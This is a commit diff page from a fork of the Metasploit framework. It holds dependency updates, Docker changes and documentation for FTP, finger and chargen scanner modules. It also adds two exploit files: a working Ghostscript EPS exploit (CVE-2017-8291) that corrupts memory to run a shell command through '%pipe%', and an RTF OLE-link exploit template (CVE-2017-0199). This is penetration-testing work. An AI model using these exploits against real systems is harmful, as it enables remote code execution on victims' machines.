dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Merge branch 'master' into land-8293-multi-railgun

This commit is contained in:
Brent Cook 2017-05-11 10:05:28 -05:00
parent a3bcd20b26 e8aed42ecd
commit 8422a7db39
3374 changed files with 7620 additions and 8999 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
.dockerignore
View File

@ -5,6 +5,10 @@ docker-compose*.yml
docker/
!docker/msfconsole.rc
README.md
.git/
.github/
.ruby-version
.ruby-gemset
.bundle
Gemfile.local
@ -93,3 +97,6 @@ data/meterpreter/ext_server_pivot.*.dll
# https://rapid7.github.io/metasploit-framework. It's an orphan branch.
/metakitty
.vagrant
# no need for rspecs
spec/

3
.gitignore vendored
View File

@ -88,3 +88,6 @@ data/meterpreter/ext_server_pivot.*.dll
# local docker compose overrides
docker-compose.local*
# Ignore python bytecode
*.pyc

14
.travis.yml
View File

@ -16,12 +16,15 @@ rvm:
- '2.4.1'
env:
- RAKE_TASKS="cucumber cucumber:boot" CREATE_BINSTUBS=true
- RAKE_TASKS=spec SPEC_OPTS="--tag content"
- RAKE_TASKS=spec SPEC_OPTS="--tag ~content"
- CMD=bundle exec rake "cucumber cucumber:boot" CREATE_BINSTUBS=true
- CMD=bundle exec rake spec SPEC_OPTS="--tag content"
- CMD=bundle exec rake spec SPEC_OPTS="--tag ~content"
matrix:
fast_finish: true
include:
- rvm: ruby-head
env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build"
before_install:
- "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
- rake --version
@ -36,7 +39,7 @@ before_script:
- bundle exec rake db:migrate
script:
# fail build if db/schema.rb update is not committed
- git diff --exit-code db/schema.rb && bundle exec rake $RAKE_TASKS
- git diff --exit-code db/schema.rb && $CMD
notifications:
irc: "irc.freenode.org#msfnotify"
@ -49,3 +52,6 @@ branches:
except:
- gh-pages
- metakitty
services:
- docker

58
Gemfile.lock
View File

@ -1,13 +1,13 @@
GIT
remote: https://github.com/WinRb/rubyntlm
revision: 7e2daf6076ba55a435d3e345498a7df40faa3d49
revision: 38aaf1d59dd1a443e4a9c0aea2be232cfe262772
branch: master
specs:
rubyntlm (0.6.1)
rubyntlm (0.6.2)
GIT
remote: https://github.com/banister/method_source
revision: 6dcb116e37e20e58f615ffe05a40bbe9a536e44a
revision: 0cc6cc8e15d08880585e8cb0c54e13c3cf937c54
branch: master
specs:
method_source (0.8.1)
@ -31,7 +31,7 @@ GIT
PATH
remote: .
specs:
metasploit-framework (4.14.15)
metasploit-framework (4.14.17)
actionpack (~> 4.2.6)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@ -44,9 +44,9 @@ PATH
metasploit-concern
metasploit-credential
metasploit-model
metasploit-payloads (= 1.2.24)
metasploit-payloads (= 1.2.28)
metasploit_data_models
metasploit_payloads-mettle (= 0.1.8)
metasploit_payloads-mettle (= 0.1.9)
msgpack
nessus_rest
net-ssh
@ -56,7 +56,7 @@ PATH
octokit
openssl-ccm
openvas-omp
packetfu (= 1.1.13.pre)
packetfu
patch_finder
pcaprub
pg
@ -136,7 +136,7 @@ GEM
bcrypt (3.1.11)
bindata (2.4.0)
builder (3.2.3)
capybara (2.13.0)
capybara (2.14.0)
addressable
mime-types (>= 1.16)
nokogiri (>= 1.3.3)
@ -146,7 +146,7 @@ GEM
childprocess (0.5.9)
ffi (~> 1.0, >= 1.0.11)
coderay (1.1.1)
contracts (0.15.0)
contracts (0.16.0)
cucumber (2.4.0)
builder (>= 2.1.2)
cucumber-core (~> 1.5.0)
@ -177,7 +177,7 @@ GEM
ffi (1.9.18)
filesize (0.1.1)
fivemat (1.3.3)
gherkin (4.1.1)
gherkin (4.1.3)
google-protobuf (3.2.0.2)
googleauth (0.5.1)
faraday (~> 0.9)
@ -222,7 +222,7 @@ GEM
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-payloads (1.2.24)
metasploit-payloads (1.2.28)
metasploit_data_models (2.0.14)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@ -233,7 +233,7 @@ GEM
postgres_ext
railties (~> 4.2.6)
recog (~> 2.0)
metasploit_payloads-mettle (0.1.8)
metasploit_payloads-mettle (0.1.9)
mime-types (3.1)
mime-types-data (~> 3.2015)
mime-types-data (3.2016.0521)
@ -254,7 +254,7 @@ GEM
openssl-ccm (1.2.1)
openvas-omp (0.0.4)
os (0.9.6)
packetfu (1.1.13.pre)
packetfu (1.1.13)
pcaprub
patch_finder (1.0.2)
pcaprub (0.12.4)
@ -283,7 +283,7 @@ GEM
thor (>= 0.18.1, < 2.0)
rake (12.0.0)
rb-readline (0.5.4)
recog (2.1.5)
recog (2.1.6)
nokogiri
redcarpet (3.4.0)
rex-arch (0.1.4)
@ -299,7 +299,7 @@ GEM
metasm
rex-arch
rex-text
rex-exploitation (0.1.12)
rex-exploitation (0.1.13)
jsobfu
metasm
rex-arch
@ -312,7 +312,7 @@ GEM
rex-arch
rex-ole (0.1.5)
rex-text
rex-powershell (0.1.70)
rex-powershell (0.1.71)
rex-random_identifier
rex-text
rex-random_identifier (0.1.2)
@ -333,23 +333,23 @@ GEM
rex-text
rkelly-remix (0.0.7)
robots (0.10.1)
rspec-core (3.5.4)
rspec-support (~> 3.5.0)
rspec-expectations (3.5.0)
rspec-core (3.6.0)
rspec-support (~> 3.6.0)
rspec-expectations (3.6.0)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.5.0)
rspec-mocks (3.5.0)
rspec-support (~> 3.6.0)
rspec-mocks (3.6.0)
diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.5.0)
rspec-rails (3.5.2)
rspec-support (~> 3.6.0)
rspec-rails (3.6.0)
actionpack (>= 3.0)
activesupport (>= 3.0)
railties (>= 3.0)
rspec-core (~> 3.5.0)
rspec-expectations (~> 3.5.0)
rspec-mocks (~> 3.5.0)
rspec-support (~> 3.5.0)
rspec-support (3.5.0)
rspec-core (~> 3.6.0)
rspec-expectations (~> 3.6.0)
rspec-mocks (~> 3.6.0)
rspec-support (~> 3.6.0)
rspec-support (3.6.0)
ruby_smb (0.0.12)
bindata
rubyntlm
@ -383,7 +383,7 @@ GEM
xmlrpc (0.3.0)
xpath (2.0.0)
nokogiri (~> 1.3)
yard (0.9.8)
yard (0.9.9)
PLATFORMS
ruby

48
LICENSE_GEMS
View File

@ -1,3 +1,4 @@
This file is auto-generated by tools/dev/update_gem_licenses.sh
actionpack, 4.2.8, MIT
actionview, 4.2.8, MIT
activemodel, 4.2.8, MIT
@ -8,14 +9,14 @@ arel, 6.0.4, MIT
arel-helpers, 2.3.0, unknown
aruba, 0.14.2, MIT
bcrypt, 3.1.11, MIT
bindata, 2.3.5, ruby
bindata, 2.4.0, ruby
bit-struct, 0.15.0, ruby
builder, 3.2.3, MIT
bundler, 1.14.6, MIT
capybara, 2.13.0, MIT
capybara, 2.14.0, MIT
childprocess, 0.5.9, MIT
coderay, 1.1.1, MIT
contracts, 0.15.0, "Simplified BSD"
contracts, 0.16.0, "Simplified BSD"
cucumber, 2.4.0, MIT
cucumber-core, 1.5.0, MIT
cucumber-rails, 1.4.5, MIT
@ -25,31 +26,31 @@ docile, 1.1.5, MIT
erubis, 2.7.0, MIT
factory_girl, 4.8.0, MIT
factory_girl_rails, 4.8.0, MIT
faraday, 0.12.0.1, MIT
faraday, 0.12.1, MIT
ffi, 1.9.18, "New BSD"
filesize, 0.1.1, MIT
fivemat, 1.3.3, MIT
gherkin, 4.1.1, MIT
gherkin, 4.1.3, MIT
google-protobuf, 3.2.0.2, "New BSD"
googleauth, 0.5.1, "Apache 2.0"
grpc, 1.2.2, "New BSD"
grpc, 1.2.5, "New BSD"
i18n, 0.8.1, MIT
jsobfu, 0.4.2, "New BSD"
json, 2.0.3, ruby
json, 2.1.0, ruby
jwt, 1.5.6, MIT
little-plugger, 1.1.4, MIT
logging, 2.2.0, MIT
logging, 2.2.2, MIT
loofah, 2.0.3, MIT
memoist, 0.15.0, MIT
metasm, 1.0.3, LGPL
metasploit-aggregator, 0.1.3, "New BSD"
metasploit-concern, 2.0.3, "New BSD"
metasploit-credential, 2.0.8, "New BSD"
metasploit-framework, 4.14.9, "New BSD"
metasploit-framework, 4.14.17, "New BSD"
metasploit-model, 2.0.3, "New BSD"
metasploit-payloads, 1.2.19, "3-clause (or ""modified"") BSD"
metasploit-payloads, 1.2.28, "3-clause (or ""modified"") BSD"
metasploit_data_models, 2.0.14, "New BSD"
metasploit_payloads-mettle, 0.1.8, "3-clause (or ""modified"") BSD"
metasploit_payloads-mettle, 0.1.9, "3-clause (or ""modified"") BSD"
method_source, 0.8.1, MIT
mime-types, 3.1, MIT
mime-types-data, 3.2016.0521, MIT
@ -68,7 +69,7 @@ octokit, 4.7.0, MIT
openssl-ccm, 1.2.1, MIT
openvas-omp, 0.0.4, MIT
os, 0.9.6, MIT
packetfu, 1.1.13.pre, BSD
packetfu, 1.1.13, BSD
patch_finder, 1.0.2, "New BSD"
pcaprub, 0.12.4, LGPL-2.1
pg, 0.20.0, "New BSD"
@ -84,18 +85,18 @@ rails-html-sanitizer, 1.0.3, MIT
railties, 4.2.8, MIT
rake, 12.0.0, MIT
rb-readline, 0.5.4, BSD
recog, 2.1.5, unknown
recog, 2.1.6, unknown
redcarpet, 3.4.0, MIT
rex-arch, 0.1.4, "New BSD"
rex-bin_tools, 0.1.2, "New BSD"
rex-core, 0.1.9, "New BSD"
rex-encoder, 0.1.3, "New BSD"
rex-exploitation, 0.1.12, "New BSD"
rex-exploitation, 0.1.13, "New BSD"
rex-java, 0.1.4, "New BSD"
rex-mime, 0.1.4, "New BSD"
rex-nop, 0.1.0, unknown
rex-ole, 0.1.5, "New BSD"
rex-powershell, 0.1.70, "New BSD"
rex-powershell, 0.1.71, "New BSD"
rex-random_identifier, 0.1.2, "New BSD"
rex-registry, 0.1.2, "New BSD"
rex-rop_builder, 0.1.2, "New BSD"
@ -106,13 +107,13 @@ rex-text, 0.2.14, "New BSD"
rex-zip, 0.1.2, "New BSD"
rkelly-remix, 0.0.7, MIT
robots, 0.10.1, MIT
rspec-core, 3.5.4, MIT
rspec-expectations, 3.5.0, MIT
rspec-mocks, 3.5.0, MIT
rspec-rails, 3.5.2, MIT
rspec-support, 3.5.0, MIT
ruby_smb, 0.0.8, "New BSD"
rubyntlm, 0.6.1, MIT
rspec-core, 3.6.0, MIT
rspec-expectations, 3.6.0, MIT
rspec-mocks, 3.6.0, MIT
rspec-rails, 3.6.0, MIT
rspec-support, 3.6.0, MIT
ruby_smb, 0.0.12, "New BSD"
rubyntlm, 0.6.2, MIT
rubyzip, 1.2.1, "Simplified BSD"
sawyer, 0.8.1, MIT
shoulda-matchers, 3.1.1, MIT
@ -127,5 +128,6 @@ timecop, 0.8.1, MIT
tzinfo, 1.2.3, MIT
tzinfo-data, 1.2017.2, MIT
windows_error, 0.1.1, BSD
xmlrpc, 0.3.0, ruby
xpath, 2.0.0, unknown
yard, 0.9.8, MIT
yard, 0.9.9, MIT

101
data/exploits/CVE-2017-8291/msf.eps Normal file
View File

@ -0,0 +1,101 @@
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100
/size_from 10000 def
/size_step 500 def
/size_to 65000 def
/enlarge 1000 def
%/bigarr 65000 array def
0
size_from size_step size_to {
pop
1 add
} for
/buffercount exch def
/buffersizes buffercount array def
0
size_from size_step size_to {
buffersizes exch 2 index exch put
1 add
} for
pop
/buffers buffercount array def
0 1 buffercount 1 sub {
/ind exch def
buffersizes ind get /cursize exch def
cursize string /curbuf exch def
buffers ind curbuf put
cursize 16 sub 1 cursize 1 sub {
curbuf exch 255 put
} for
} for
/buffersearchvars [0 0 0 0 0] def
/sdevice [0] def
enlarge array aload
{
.eqproc
buffersearchvars 0 buffersearchvars 0 get 1 add put
buffersearchvars 1 0 put
buffersearchvars 2 0 put
buffercount {
buffers buffersearchvars 1 get get
buffersizes buffersearchvars 1 get get
16 sub get
254 le {
buffersearchvars 2 1 put
buffersearchvars 3 buffers buffersearchvars 1 get get put
buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put
} if
buffersearchvars 1 buffersearchvars 1 get 1 add put
} repeat
buffersearchvars 2 get 1 ge {
exit
} if
%(.) print
} loop
.eqproc
.eqproc
.eqproc
sdevice 0
currentdevice
buffersearchvars 3 get buffersearchvars 4 get 16#7e put
buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put
buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put
put
buffersearchvars 0 get array aload
sdevice 0 get
16#3e8 0 put
sdevice 0 get
16#3b0 0 put
sdevice 0 get
16#3f0 0 put
currentdevice null false mark /OutputFile (%pipe%echo vulnerable > /dev/tty)
.putdeviceparams
1 true .outputpage
.rsdparams
%{ } loop
0 0 .quit
%asdf

33
data/exploits/cve-2017-0199.rtf Normal file
View File

@ -0,0 +1,33 @@
{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0
{\info
{\author Microsoft}
{\operator Microsoft}
}
{\*\xmlnstbl {\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}
{
{\object\objautlink\objupdate\rsltpict\objw291\objh230\objscalex99\objscaley101
{\*\objclass Word.Document.8}
{\*\objdata 0105000002000000
090000004f4c45324c696e6b000000000000000000000a0000
d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d
6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
MINISTREAM_DATA
0105000000000000}
{\result {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid1979324 }}}}
{\*\datastore }
}

4
docker-compose.yml
View File

@ -1,6 +1,6 @@
version: '2'
services:
ms: &ms
ms:
image: metasploit
build:
context: .
@ -12,7 +12,7 @@ services:
ports:
- 4444:4444
volumes:
- $HOME/.msf4:/root/.msf4
- $HOME/.msf4:/home/msf/.msf4
db:
image: postgres:9.6

75
docker/Dockerfile
View File

@ -1,47 +1,54 @@
FROM ruby:2.3-alpine
MAINTAINER Rapid7
ARG BUNDLER_ARGS="--system --jobs=8"
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
ENV APP_HOME /usr/src/metasploit-framework/
ENV MSF_USER msf
WORKDIR $APP_HOME
COPY Gemfile* m* Rakefile $APP_HOME
COPY lib $APP_HOME/lib
RUN apk update && \
apk add \
ruby-bigdecimal \
ruby-bundler \
ruby-io-console \
autoconf \
bison \
subversion \
git \
sqlite \
nmap \
libxslt \
postgresql \
ncurses \
&& apk add --virtual .ruby-builddeps \
build-base \
ruby-dev \
libffi-dev\
openssl-dev \
readline-dev \
sqlite-dev \
postgresql-dev \
libpcap-dev \
libxml2-dev \
libxslt-dev \
yaml-dev \
zlib-dev \
ncurses-dev \
bison \
autoconf \
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
&& bundle install $BUNDLER_ARGS \
&& apk del .ruby-builddeps \
&& rm -rf /var/cache/apk/*
apk add \
sqlite-libs \
nmap \
postgresql-libs \
# needed as long as metasploit-framework.gemspec contains a 'git ls'
git \
ncurses \
libcap \
&& apk add --virtual .ruby-builddeps \
autoconf \
bison \
build-base \
ruby-dev \
libffi-dev\
openssl-dev \
readline-dev \
sqlite-dev \
postgresql-dev \
libpcap-dev \
libxml2-dev \
libxslt-dev \
yaml-dev \
zlib-dev \
ncurses-dev \
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
&& bundle install --system $BUNDLER_ARGS \
&& apk del .ruby-builddeps \
&& rm -rf /var/cache/apk/*
# fix for robots gem not readable (known bug)
# https://github.com/rapid7/metasploit-framework/issues/6068
RUN chmod o+r /usr/local/bundle/gems/robots-*/lib/robots.rb
RUN adduser -g msfconsole -D $MSF_USER
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
USER $MSF_USER
ADD ./ $APP_HOME
CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]

6
docker/docker-compose.development.override.yml
View File

@ -1,7 +1,11 @@
version: '2'
services:
ms: &ms
ms:
build:
args:
BUNDLER_ARGS: --jobs=8
image: metasploit:dev
environment:
DATABASE_URL: postgres://postgres@db:5432/msf_dev

7
docker/msfconsole.rc
View File

@ -1,5 +1,10 @@
<ruby>
run_single("setg LHOST #{ENV['LHOST']}") if ENV['LHOST']
run_single("setg LPORT #{ENV['LPORT']}") if ENV['LPORT']
if ENV['LHOST']
lhost = ENV['LHOST']
else
lhost = %x(hostname -i)
end
run_single("setg LHOST #{lhost}")
run_single("db_connect #{ENV['DATABASE_URL'].gsub('postrgres://', '')}") if ENV['DATABASE_URL']
</ruby>

27
documentation/modules/auxiliary/scanner/backdoor/energizer_duo_detect.md Normal file
View File

@ -0,0 +1,27 @@
## Vulnerable Application
More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.
The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).
## Verification Steps
1. Install the vulnerable software
2. Start msfconsole
3. Do: `use auxiliary/scanner/backdoor/energizer_duo_detect`
4. Do: `set rhosts`
5. Do: `run`
## Scenarios
A run against the backdoor
```
msf > use auxiliary/scanner/backdoor/energizer_duo_detect
msf auxiliary(energizer_duo_detect) > set RHOSTS 192.168.0.0/24
msf auxiliary(energizer_duo_detect) > set THREADS 256
msf auxiliary(energizer_duo_detect) > run
[*] 192.168.0.132:7777 FOUND: [["F", "AUTOEXEC.BAT"]...
```

50
documentation/modules/auxiliary/scanner/chargen/chargen_probe.md Normal file
View File

@ -0,0 +1,50 @@
## Vulnerable Application
Chargen is a debugging and measurement tool and a character generator service. Often `chargen` is included in `xinetd`,
along with `echo`, `time`, `daytime`, and `discard`.
While its possible to run chargen on TCP, the most common implementation is UDP.
The following was done on Kali linux:
1. `apt-get install xinetd`
2. edit `/etc/xinetd.d/chargen` and changed `disabled = yes` to `disabled = no`. The first one is for `TCP` and the second is for `UDP`.
3. Restart the service: `service xinetd restart`
## Verification Steps
1. Install and configure chargen
2. Start msfconsole
3. Do: `use auxiliary/scanner/chargen/chargen_probe`
4. Do: `run`
## Scenarios
A run against the configuration from these docs
```
msf > use auxiliary/scanner/chargen/chargen_probe
msf auxiliary(chargen_probe) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf auxiliary(chargen_probe) > set verbose true
verbose => true
msf auxiliary(chargen_probe) > run
[*] 127.0.0.1:19 - Response: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh
"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi
#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij
$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijk
%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijkl
&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklm
'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmn
()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmno
)*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnop
*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopq
+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqr
,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrs
-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrst
./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi
[+] 127.0.0.1:19 answers with 1022 bytes (headers + UDP payload)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

58
documentation/modules/auxiliary/scanner/finger/finger_users.md Normal file
View File

@ -0,0 +1,58 @@
## Vulnerable Application
Finger is an older protocol which displays information about users on a machine. This can be abused to verify if a user is valid on that machine.
The protocol itself was designed in the 1970s, and is run in cleartext.
The following was done on Kali linux:
1. `apt-get install inetutils-inetd fingerd`
2. Start the service: `/etc/init.d/inetutils-inetd start`
## Verification Steps
1. Install fingerd
2. Start msfconsole
3. Do: `use auxiliary/scanner/finger/finger_users`
4. Do: `set rhosts`
5. Do: `run`
## Options
**USERS_FILE**
The USERS_FILE is a newline delimited list of users and defaults to `unix_users.txt` included with metasploit.
## Scenarios
A run against the configuration from these docs
```
msf > use auxiliary/scanner/finger/finger_users
msf auxiliary(finger_users) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf auxiliary(finger_users) > run
[+] 127.0.0.1:79 - 127.0.0.1:79 - Found user: root
[+] 127.0.0.1:79 - 127.0.0.1:79 Users found: root
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
## Confirming using NMAP
Utilizing the [finger](https://nmap.org/nsedoc/scripts/finger.html) script
```
# nmap -p 79 --script finger 127.0.0.1
Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-26 19:35 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000039s latency).
PORT STATE SERVICE
79/tcp open finger
| finger: Login Name Tty Idle Login Time Office Office Phone\x0D
| root root tty2 16d Apr 10 19:17 (:0)\x0D
|_root root *pts/3 1d Apr 25 19:11 (192.168.2.175)\x0D
Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
```

93
documentation/modules/auxiliary/scanner/ftp/anonymous.md Normal file
View File

@ -0,0 +1,93 @@
## Description
This module allows us to scan through a series of IP Addresses and provide details whether anonymous access is allowed or not in that particular FTP server. By default, anonymous access is not allowed by the FTP server.
## Vulnerable Application
### Install ftp server on Kali Linux:
1. ```apt-get install vsftpd```
2. Allow local users to log in and to allow ftp uploads by editing file `/etc/vsftpd.conf` uncommenting the following:
```
local_enable=YES
write_enable=YES
chroot_list_enable=YES
chroot_list_file=/etc/vsftpd.chroot_list
```
3. **IMPORTANT:** For allowing anonymous access set ```anonymous_enable=YES```
4. Create the file `/etc/vsftpd.chroot_list` and add the local users you want allow to connect to FTP server. Start service and test connections:
5. ```service vsftpd start```
### Installing FTP for IIS 7.5 in Windows:
#### IIS 7.5 for Windows Server 2008 R2:
1. On the taskbar, click Start, point to Administrative Tools, and then click Server Manager.
2. In the Server Manager hierarchy pane, expand Roles, and then click Web Server (IIS).
3. In the Web Server (IIS) pane, scroll to the Role Services section, and then click Add Role Services.
4. On the Select Role Services page of the Add Role Services Wizard, expand FTP Server.
5. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
6. Click Next.
7. On the Confirm Installation Selections page, click Install.
8. On the Results page, click Close.
#### IIS 7.5 for Windows 7:
1. On the taskbar, click Start, and then click Control Panel.
2. In Control Panel, click Programs and Features, and then click Turn Windows Features on or off.
3. Expand Internet Information Services, then FTP Server.
4. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
5. Click OK.
#### Enabling anonymous login on IIS
1. Open IIS Manager and navigate to the level you want to manage. ...
2. In Features View, double-click Authentication.
3. On the Authentication page, select Anonymous Authentication.
4. In the Actions pane, click Enable to use Anonymous authentication with the default settings.
## Verification Steps
1. Do: ```use auxiliary/scanner/ftp/anonymous```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [IP]```
4. Do: ```run```
## Sample Output
### On vsFTPd 3.0.3 on Kali
```
msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary(anonymous) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(anonymous) > set RPORT 21
RPORT => 21
msf auxiliary(anonymous) > exploit
[+] 127.0.0.1:21 - 127.0.0.1:21 - Anonymous READ (220 (vsFTPd 3.0.3))
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(anonymous) >
```
## Confirming using NMAP
```
root@kali:~# nmap -sV -sC 127.0.0.1 -p 21
Starting Nmap 7.40SVN ( https://nmap.org ) at 2017-04-24 22:58 IST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000035s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
Service Info: OS: Unix
root@kali:~#
```

62
documentation/modules/auxiliary/scanner/ftp/ftp_login.md Normal file
View File

@ -0,0 +1,62 @@
## Description
This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
## Vulnerable Application
### Install ftp server on Kali Linux:
1. ```apt-get install vsftpd```
2. Allow local users to log in and to allow ftp uploads by editing file `/etc/vsftpd.conf` uncommenting the following:
```
local_enable=YES
write_enable=YES
chroot_list_enable=YES
chroot_list_file=/etc/vsftpd.chroot_list
```
3. Create the file `/etc/vsftpd.chroot_list` and add the local users you want allow to connect to FTP server. Start service and test connections:
4. ```service vsftpd start```
### Installing FTP for IIS 7.5 in Windows:
#### IIS 7.5 for Windows Server 2008 R2:
1. On the taskbar, click Start, point to Administrative Tools, and then click Server Manager.
2. In the Server Manager hierarchy pane, expand Roles, and then click Web Server (IIS).
